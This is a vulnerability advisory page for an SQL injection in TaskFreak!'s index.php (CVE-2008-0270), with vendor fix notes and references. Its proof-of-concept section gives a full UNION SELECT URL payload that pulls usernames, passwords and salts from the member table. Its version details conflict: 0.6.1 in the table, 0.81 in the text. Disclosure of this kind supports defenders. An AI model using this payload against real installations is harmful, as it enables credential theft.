TaskFreak! 'index.php' SQL Injection Vulnerability
BID:27257
Info
TaskFreak! 'index.php' SQL Injection Vulnerability
| Bugtraq ID: | 27257 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0270 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 12 2008 12:00AM |
| Updated: | May 07 2015 05:33PM |
| Credit: | The Defaced Security Team discovered this vulnerability. |
| Vulnerable: |
Stan Ozier TaskFreak! 0.6.1 |
| Not Vulnerable: |
Stan Ozier TaskFreak! 0.6.2 |
Discussion
TaskFreak! 'index.php' SQL Injection Vulnerability
TaskFreak! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects TaskFreak! 0.81; other versions may also be vulnerable.
TaskFreak! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects TaskFreak! 0.81; other versions may also be vulnerable.
Exploit / POC
TaskFreak! 'index.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof of concept is available:
http://www.example.com/index.php?sProject=0&id=&mode=save&sort=deadlineDate&dir=1&show=today&sUser=1&sContext=1'+GROUP+BY+1+union+all+select+1,2,3,4,5,concat(username,char(58),password,char(58),salt),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+prefix_member/*
Attackers can use a browser to exploit this issue.
The following proof of concept is available:
http://www.example.com/index.php?sProject=0&id=&mode=save&sort=deadlineDate&dir=1&show=today&sUser=1&sContext=1'+GROUP+BY+1+union+all+select+1,2,3,4,5,concat(username,char(58),password,char(58),salt),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+prefix_member/*
Solution / Fix
TaskFreak! 'index.php' SQL Injection Vulnerability
Solution:
The vendor released an update to address this issue. Please see the references for more information.
Stan Ozier TaskFreak! 0.6.1
Solution:
The vendor released an update to address this issue. Please see the references for more information.
Stan Ozier TaskFreak! 0.6.1
-
Stan Ozier Multi User/mySQL 0.6.2
http://www.taskfreak.com/download.php?version=multi-mySQL-0.6
References
TaskFreak! 'index.php' SQL Injection Vulnerability
References:
References:
- TaskFreak! Homepage (Stan Ozier)
- TaskFreak! Version History (Stan Ozier)